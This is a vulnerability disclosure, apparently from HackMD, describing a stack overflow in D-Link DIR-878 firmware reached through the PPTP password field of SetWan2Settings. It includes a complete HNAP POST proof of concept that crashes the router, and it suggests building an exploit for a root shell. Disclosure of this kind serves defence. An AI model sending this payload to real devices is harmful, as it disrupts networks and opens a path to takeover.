Try โ€‚โ€‰HackMD

D-Link DIR-878 was discovered stack overflow in the SetWan2Settings module when the mode was set to PPTP

vendor:D-Link

product:DIR-878

version:DIR_878_FW1.30B08.bin

type:Stack Overflow

author:Yifeng Li, Wolin Zhuang;

Vulnerability Description

D-Link DIR-878 DIR_878_FW1.30B08.bin was discovered to contain a stack overflow via the Password parameter in the SetWan2Settings module when the mode was set to PPTP.

Vulnerability Details

When mode parameteris set to "PPTP".
In module SetWan2Settings,the content obtained by the programe through /SetWan2Settings/Password is passed to v39 which is controllable for attacker and latet passed into function decrypt_aes as a parameter.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

After that, it is passed into function sub_426D74 as the first parameter as a2.Besides, we notice that local variable v6 is placed on the stack, which is also passed into function sub_426D74 as the second parameter.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

In function sub_426D74, the for loop from line 26 to line 32, first copy a1 to v7 then strtol transfer v7 to a2, which briefly, a2 equals hexdecode(a1).Let's start over again, a1, comes from a2 in function decrypt_aes, a variable is controllable to the attacker.And a2 comes from v6 in function decrypt_aes which is placed on the stack, so when we copy a1 to a2 in sub_426D74, we are basically putting v4's value into v6, which leads to a stack overflow vulnerbility .

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

Recurring vulnerabilities and POC

In order to reproduce the vulnerability, the following steps can be followed:

  1. Install firmware DIR_878_FW1.30B08.bin to router DIR878
  2. Login to 192.168.0.1 as admin
  3. Attack with the following POC
    Image Not Showing Possible Reasons
    • The image file may be corrupted
    • The server hosting the image is unavailable
    • The image path is incorrect
    • The image format is not supported
    Learn More โ†’
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
Content-Length: 1110
Accept: text/xml
HNAP_AUTH: B4AD3DD3DC3B8C89DAFF77C55619710A 1675740360962
SOAPACTION: "http://purenetworks.com/HNAP1/SetWan2Settings"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: text/xml
Origin: http://192.168.0.1
Referer: http://192.168.0.1/Internet.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: uid=ZqBeUNPQ
Connection: close

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
	<soap:Body>
		<SetWan2Settings xmlns="http://purenetworks.com/HNAP1/">
			<Type>DHCPPPTP</Type>
			<Username>admin</Username>
			<Password>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</Password>
			<MaxIdleTime>0</MaxIdleTime>
			<HostName/>
			<VPNIPAddress/>
			<VPNSubnetMask/>
			<VPNGateway/>
			<ServiceName></ServiceName>
			<AutoReconnect>true</AutoReconnect>
			<IPAddress></IPAddress>
			<SubnetMask/>
			<Gateway/>
			<ConfigDNS>
				<Primary></Primary>
				<Secondary></Secondary>
			</ConfigDNS>
			<MacAddress></MacAddress>
			<MTU>1492</MTU>
			<DsLite_Configuration/>
			<DsLite_AFTR_IPv6Address/>
			<DsLite_B4IPv4Address/>
		</SetWan2Settings>
	</soap:Body>
</soap:Envelope>

By sending delicately constructed data package as the poc above, we can cause a stack overflow error, leading to denial of service.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More โ†’

You can write your own exp to get the root shell.